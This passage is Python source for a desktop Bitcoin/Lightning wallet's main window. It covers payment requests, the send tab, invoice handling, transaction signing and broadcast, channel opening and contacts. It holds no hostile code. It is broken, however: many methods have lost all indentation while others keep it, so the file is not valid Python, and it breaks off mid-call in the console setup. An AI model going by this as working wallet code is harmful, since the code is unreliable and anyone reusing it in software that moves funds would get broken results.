                if not self.question(''.join(msg)):
                    return
                addr = self.wallet.get_receiving_address()
            else:  # deterministic wallet
                if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
                    return
                addr = self.wallet.create_new_address(False)
        req = self.wallet.make_payment_request(addr, amount, message, expiration)
        try:
            self.wallet.add_payment_request(req)
        except Exception as e:
            self.logger.exception('Error adding payment request')
            self.show_error(_('Error adding payment request') + ':\n' + repr(e))
        else:
            # request stored: sign it (alias/OpenAlias) and return its key
            self.sign_payment_request(addr)
            return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
    def toggle_qr_window(self):
        """Show or hide the detached QR-code window, preserving its geometry."""
        from . import qrwindow
        if not self.qr_window:
            # first use: create the window and remember its initial geometry
            self.qr_window = qrwindow.QR_Window(self)
            self.qr_window.setVisible(True)
            self.qr_window_geometry = self.qr_window.geometry()
        else:
            if not self.qr_window.isVisible():
                # re-show at the position the user left it
                self.qr_window.setVisible(True)
                self.qr_window.setGeometry(self.qr_window_geometry)
            else:
                # hide, saving current geometry for next time
                self.qr_window_geometry = self.qr_window.geometry()
                self.qr_window.setVisible(False)
        self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
    def create_send_tab(self):
        """Build and return the Send tab widget.

        Lays out the payto / description / amount editors, the fiat amount
        field, the Max/Save/Pay/Clear buttons, and the invoice list.
        """
        # A 4-column grid layout. All the stretch is in the last column.
        # The exchange rate plugin adds a fiat widget in column 2
        self.send_grid = grid = QGridLayout()
        grid.setSpacing(8)
        grid.setColumnStretch(3, 1)
        from .paytoedit import PayToEdit
        self.amount_e = BTCAmountEdit(self.get_decimal_point)
        self.payto_e = PayToEdit(self)
        self.payto_e.addPasteButton(self.app)
        msg = _('Recipient of the funds.') + '\n\n'\
              + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
        payto_label = HelpLabel(_('Pay to'), msg)
        grid.addWidget(payto_label, 1, 0)
        grid.addWidget(self.payto_e, 1, 1, 1, -1)
        # autocompletion of contact labels in the payto field
        completer = QCompleter()
        completer.setCaseSensitivity(False)
        self.payto_e.set_completer(completer)
        completer.setModel(self.completions)
        msg = _('Description of the transaction (not mandatory).') + '\n\n'\
              + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
        description_label = HelpLabel(_('Description'), msg)
        grid.addWidget(description_label, 2, 0)
        self.message_e = FreezableLineEdit()
        self.message_e.setMinimumWidth(700)
        grid.addWidget(self.message_e, 2, 1, 1, -1)
        msg = _('Amount to be sent.') + '\n\n' \
              + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
              + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
              + _('Keyboard shortcut: type "!" to send all your coins.')
        amount_label = HelpLabel(_('Amount'), msg)
        grid.addWidget(amount_label, 3, 0)
        grid.addWidget(self.amount_e, 3, 1)
        self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
        if not self.fx or not self.fx.is_enabled():
            self.fiat_send_e.setVisible(False)
        grid.addWidget(self.fiat_send_e, 3, 2)
        # keep the fiat field's frozen state in sync with the BTC amount field
        self.amount_e.frozen.connect(
            lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
        self.max_button = EnterButton(_("Max"), self.spend_max)
        self.max_button.setFixedWidth(100)
        self.max_button.setCheckable(True)
        grid.addWidget(self.max_button, 3, 3)
        self.save_button = EnterButton(_("Save"), self.do_save_invoice)
        self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
        self.clear_button = EnterButton(_("Clear"), self.do_clear)
        buttons = QHBoxLayout()
        buttons.addStretch(1)
        buttons.addWidget(self.clear_button)
        buttons.addWidget(self.save_button)
        buttons.addWidget(self.send_button)
        grid.addLayout(buttons, 6, 1, 1, 4)
        self.amount_e.shortcut.connect(self.spend_max)
        def reset_max(text):
            # editing either amount field cancels "Max" mode
            self.max_button.setChecked(False)
            enable = not bool(text) and not self.amount_e.isReadOnly()
            #self.max_button.setEnabled(enable)
        self.amount_e.textEdited.connect(reset_max)
        self.fiat_send_e.textEdited.connect(reset_max)
        self.set_onchain(False)
        self.invoices_label = QLabel(_('Send queue'))
        from .invoice_list import InvoiceList
        self.invoice_list = InvoiceList(self)
        vbox0 = QVBoxLayout()
        vbox0.addLayout(grid)
        hbox = QHBoxLayout()
        hbox.addLayout(vbox0)
        hbox.addStretch(1)
        w = QWidget()
        vbox = QVBoxLayout(w)
        vbox.addLayout(hbox)
        vbox.addStretch(1)
        vbox.addWidget(self.invoices_label)
        vbox.addWidget(self.invoice_list)
        vbox.setStretchFactor(self.invoice_list, 1000)
        w.searchable_list = self.invoice_list
        run_hook('create_send_tab', grid)
        return w
    def spend_max(self):
        """'Max' button handler: fill the amount field with the spendable maximum.

        Builds a throwaway max-spend transaction to determine the amount after
        fees (including any plugin extra fee, e.g. trustedcoin).
        """
        if run_hook('abort_send', self):
            return
        outputs = self.payto_e.get_outputs(True)
        if not outputs:
            return
        make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
            coins=self.get_coins(),
            outputs=outputs,
            fee=fee_est,
            is_sweep=False)
        try:
            try:
                tx = make_tx(None)
            except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
                # Check if we had enough funds excluding fees,
                # if so, still provide opportunity to set lower fees.
                tx = make_tx(0)
        except MultipleSpendMaxTxOutputs as e:
            self.max_button.setChecked(False)
            self.show_error(str(e))
            return
        except NotEnoughFunds as e:
            self.max_button.setChecked(False)
            text = self.get_text_not_enough_funds_mentioning_frozen()
            self.show_error(text)
            return
        self.max_button.setChecked(True)
        amount = tx.output_value()
        # plugins may take an extra fee out of the max-spend amount
        __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
        amount_after_all_fees = amount - x_fee_amount
        self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
    @protected
    def protect(self, func, args, password):
        # Generic password-protected trampoline: the @protected decorator
        # prompts for the wallet password and passes it in as *password*,
        # which is appended to *args* when calling *func*.
        return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
    def check_send_tab_payto_line_and_show_errors(self) -> bool:
        """Returns whether there are errors.
        Also shows error dialog to user if so.

        Checks, in order: expired BIP70 request, payto parse errors,
        and unvalidated (non-DNSSEC) aliases.
        """
        pr = self.payment_request
        if pr:
            if pr.has_expired():
                self.show_error(_('Payment request has expired'))
                return True
        if not pr:
            errors = self.payto_e.get_errors()
            if errors:
                if len(errors) == 1 and not errors[0].is_multiline:
                    # single simple error: show it with the offending line
                    err = errors[0]
                    self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
                                      f"{err.line_content[:40]}...\n\n"
                                      f"{err.exc!r}")
                else:
                    # several errors: list each offending line number
                    self.show_warning(_("Invalid Lines found:") + "\n\n" +
                                      '\n'.join([_("Line #") +
                                                 f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
                                                 for err in errors]))
                return True
            if self.payto_e.is_alias and self.payto_e.validated is False:
                # alias did not pass DNSSEC validation: let the user decide
                alias = self.payto_e.toPlainText()
                msg = _('WARNING: the alias "{}" could not be validated via an additional '
                        'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
                msg += _('Do you wish to continue?')
                if not self.question(msg):
                    return True
        return False  # no errors
    def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
        """Ask the user for confirmation, then pay a BOLT11 invoice via lnworker."""
        if amount_msat is None:
            raise Exception("missing amount for LN invoice")
        amount_sat = Decimal(amount_msat) / 1000
        # FIXME this is currently lying to user as we truncate to satoshis
        msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
        if not self.question(msg):
            return
        self.save_pending_invoice()
        def task():
            # runs on the wallet's task thread; blocks until the payment
            # coroutine finishes on the network's asyncio loop
            coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
            fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
            return fut.result()
        self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
    def read_invoice(self):
        """Parse the send tab into an invoice object.

        Returns an LNInvoice (lightning mode) or an onchain invoice,
        or None if validation failed (an error dialog is shown).
        """
        if self.check_send_tab_payto_line_and_show_errors():
            return
        if not self._is_onchain:
            invoice_str = self.payto_e.lightning_invoice
            if not invoice_str:
                return
            if not self.wallet.has_lightning():
                self.show_error(_('Lightning is disabled'))
                return
            invoice = LNInvoice.from_bech32(invoice_str)
            if invoice.get_amount_msat() is None:
                # amountless invoice: take the amount from the amount field
                amount_sat = self.amount_e.get_amount()
                if amount_sat:
                    invoice.amount_msat = int(amount_sat * 1000)
                else:
                    self.show_error(_('No amount'))
                    return
            return invoice
        else:
            outputs = self.read_outputs()
            if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
                return
            message = self.message_e.text()
            return self.wallet.create_invoice(
                outputs=outputs,
                message=message,
                pr=self.payment_request,
                URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
    def do_pay_invoice(self, invoice: 'Invoice'):
        """Dispatch payment of *invoice* to the lightning or onchain flow."""
        if invoice.type == PR_TYPE_LN:
            assert isinstance(invoice, LNInvoice)
            self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
        elif invoice.type == PR_TYPE_ONCHAIN:
            assert isinstance(invoice, OnchainInvoice)
            self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
        else:
            raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
    def pay_onchain_dialog(
            self, inputs: Sequence[PartialTxInput],
            outputs: List[PartialTxOutput], *,
            external_keypairs=None) -> None:
        """Run the confirm/preview dialog for an onchain payment and, if the
        user confirms, sign and broadcast the transaction.

        *external_keypairs* being set marks this as a sweep of external keys.
        """
        # trustedcoin requires this
        if run_hook('abort_send', self):
            return
        is_sweep = bool(external_keypairs)
        make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
            coins=inputs,
            outputs=outputs,
            fee=fee_est,
            is_sweep=is_sweep)
        output_values = [x.value for x in outputs]
        # '!' marks a spend-max output; at most one is allowed
        if output_values.count('!') > 1:
            self.show_error(_("More than one output set to spend max"))
            return
        output_value = '!' if '!' in output_values else sum(output_values)
        conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
        if conf_dlg.not_enough_funds:
            # Check if we had enough funds excluding fees,
            # if so, still provide opportunity to set lower fees.
            if not conf_dlg.have_enough_funds_assuming_zero_fees():
                text = self.get_text_not_enough_funds_mentioning_frozen()
                self.show_message(text)
                return
        # shortcut to advanced preview (after "enough funds" check!)
        if self.config.get('advanced_preview'):
            preview_dlg = PreviewTxDialog(
                window=self,
                make_tx=make_tx,
                external_keypairs=external_keypairs,
                output_value=output_value)
            preview_dlg.show()
            return
        cancelled, is_send, password, tx = conf_dlg.run()
        if cancelled:
            return
        if is_send:
            self.save_pending_invoice()
            def sign_done(success):
                if success:
                    self.broadcast_or_show(tx)
            self.sign_tx_with_password(tx, callback=sign_done, password=password,
                                       external_keypairs=external_keypairs)
        else:
            # user chose 'Preview' instead of sending directly
            preview_dlg = PreviewTxDialog(
                window=self,
                make_tx=make_tx,
                external_keypairs=external_keypairs,
                output_value=output_value)
            preview_dlg.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
    @protected
    def sign_tx(self, tx, *, callback, external_keypairs, password):
        # @protected prompts for the wallet password and injects it as *password*.
        self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
    def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
        '''Sign the transaction in a separate thread. When done, calls
        the callback with a success code of True or False.
        '''
        def on_success(result):
            callback(True)
        def on_failure(exc_info):
            self.on_error(exc_info)
            callback(False)
        # the trustedcoin plugin may wrap the success callback (2FA co-signing)
        on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
        if external_keypairs:
            # can sign directly
            task = partial(tx.sign, external_keypairs)
        else:
            task = partial(self.wallet.sign_transaction, tx, password)
        msg = _('Signing transaction...')
        WaitingDialog(self, msg, task, on_success, on_failure)
    def broadcast_transaction(self, tx: Transaction):
        """Broadcast *tx* on a background thread, showing a waiting dialog.

        If a BIP70 payment request is active, also sends the merchant the
        payment message and waits for its ACK.
        """
        def broadcast_thread():
            # non-GUI thread
            pr = self.payment_request
            if pr and pr.has_expired():
                self.payment_request = None
                return False, _("Invoice has expired")
            try:
                self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
            except TxBroadcastError as e:
                return False, e.get_message_for_gui()
            except BestEffortRequestFailed as e:
                return False, repr(e)
            # success
            txid = tx.txid()
            if pr:
                # BIP70 flow: notify the merchant and await the payment ACK
                self.payment_request = None
                refund_address = self.wallet.get_receiving_address()
                coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
                fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
                ack_status, ack_msg = fut.result(timeout=20)
                self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
            return True, txid
        # Capture current TL window; override might be removed on return
        parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
        def broadcast_done(result):
            # GUI thread
            if result:
                success, msg = result
                if success:
                    parent.show_message(_('Payment sent.') + '\n' + msg)
                    self.invoice_list.update()
                else:
                    msg = msg or ''
                    parent.show_error(msg)
        WaitingDialog(self, _('Broadcasting transaction...'),
                      broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
    def open_channel(self, connect_str, funding_sat, push_amt):
        """Open a lightning channel to the peer in *connect_str*, funding it
        with *funding_sat* and optionally pushing *push_amt* to the peer."""
        try:
            node_id, rest = extract_nodeid(connect_str)
        except ConnStringFormatError as e:
            self.show_error(str(e))
            return
        # use ConfirmTxDialog
        # we need to know the fee before we broadcast, because the txid is required
        make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
        d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
        # disable preview button because the user must not broadcast tx before establishment_flow
        d.preview_button.setEnabled(False)
        cancelled, is_send, password, funding_tx = d.run()
        if not is_send:
            return
        if cancelled:
            return
        # read funding_sat from tx; converts '!' to int value
        funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
        def task():
            # runs on the wallet's task thread via WaitingDialog
            return self.wallet.lnworker.open_channel(
                connect_str=connect_str,
                funding_tx=funding_tx,
                funding_sat=funding_sat,
                push_amt_sat=push_amt,
                password=password)
        def on_failure(exc_info):
            type_, e, traceback = exc_info
            self.show_error(_('Could not open channel: {}').format(repr(e)))
        WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure)
def on_open_channel_success(self, args):
chan, funding_tx = args
lnworker = self.wallet.lnworker
if not chan.has_onchain_backup():
backup_dir = self.config.get_backup_dir()
if backup_dir is not None:
self.show_message(_(f'Your wallet backup has been updated in {backup_dir}'))
else:
data = lnworker.export_channel_backup(chan.channel_id)
help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL)
self.show_qrcode(
data, _('Save channel backup'),
help_text=help_text,
show_copy_text_btn=True)
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
self.show_transaction(funding_tx)
else:
self.show_message(message)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
    def payment_request_ok(self):
        """Fill the send tab from a successfully fetched BIP70 payment request."""
        pr = self.payment_request
        if not pr:
            return
        key = pr.get_id()
        invoice = self.wallet.get_invoice(key)
        if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
            self.show_message("invoice already paid")
            self.do_clear()
            self.payment_request = None
            return
        self.payto_e.is_pr = True
        # green = valid, red/expired styling otherwise
        if not pr.has_expired():
            self.payto_e.setGreen()
        else:
            self.payto_e.setExpired()
        self.payto_e.setText(pr.get_requestor())
        self.amount_e.setAmount(pr.get_amount())
        self.message_e.setText(pr.get_memo())
        # signal to set fee
        self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
    def parse_lightning_invoice(self, invoice):
        """Parse ln invoice, and prepare the send tab for it.

        Raises LnDecodeException if *invoice* is not a valid BOLT11 string.
        """
        try:
            lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
        except Exception as e:
            raise LnDecodeException(e) from e
        pubkey = bh2u(lnaddr.pubkey.serialize())
        # find the 'd' (description) tag; for/else: empty when absent
        for k,v in lnaddr.tags:
            if k == 'd':
                description = v
                break
        else:
             description = ''
        self.payto_e.setFrozen(True)
        self.payto_e.setText(pubkey)
        self.message_e.setText(description)
        if lnaddr.get_amount_sat() is not None:
            self.amount_e.setAmount(lnaddr.get_amount_sat())
        #self.amount_e.textEdited.emit("")
        self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
    def pay_to_URI(self, URI):
        """Populate the send tab from a BIP21 'bitcoin:' URI.

        If the URI references a BIP70 request ('r', or 'name'+'sig'),
        freeze the tab and wait for the request to be fetched instead.
        """
        if not URI:
            return
        try:
            out = util.parse_URI(URI, self.on_pr)
        except InvalidBitcoinURI as e:
            self.show_error(_("Error parsing URI") + f":\n{e}")
            return
        self.show_send_tab()
        self.payto_URI = out
        r = out.get('r')
        sig = out.get('sig')
        name = out.get('name')
        if r or (name and sig):
            # BIP70 payment request: on_pr will be called asynchronously
            self.prepare_for_payment_request()
            return
        address = out.get('address')
        amount = out.get('amount')
        label = out.get('label')
        message = out.get('message')
        # use label as description (not BIP21 compliant)
        if label and not message:
            message = label
        if address:
            self.payto_e.setText(address)
        if message:
            self.message_e.setText(message)
        if amount:
            self.amount_e.setAmount(amount)
            # signal to set fee
            self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
    def update_console(self):
        """(Re)populate the console namespace with wallet/network objects and
        wrap all Commands methods so they run with this wallet and can prompt
        for a password."""
        console = self.console
        console.history = self.wallet.db.get("qt-console-history", [])
        console.history_index = len(console.history)
        console.updateNamespace({
            'wallet': self.wallet,
            'network': self.network,
            'plugins': self.gui_object.plugins,
            'window': self,
            'config': self.config,
            'electrum': electrum,
            'daemon': self.gui_object.daemon,
            'util': util,
            'bitcoin': bitcoin,
            'lnutil': lnutil,
        })
        c = commands.Commands(
            config=self.config,
            daemon=self.gui_object.daemon,
            network=self.network,
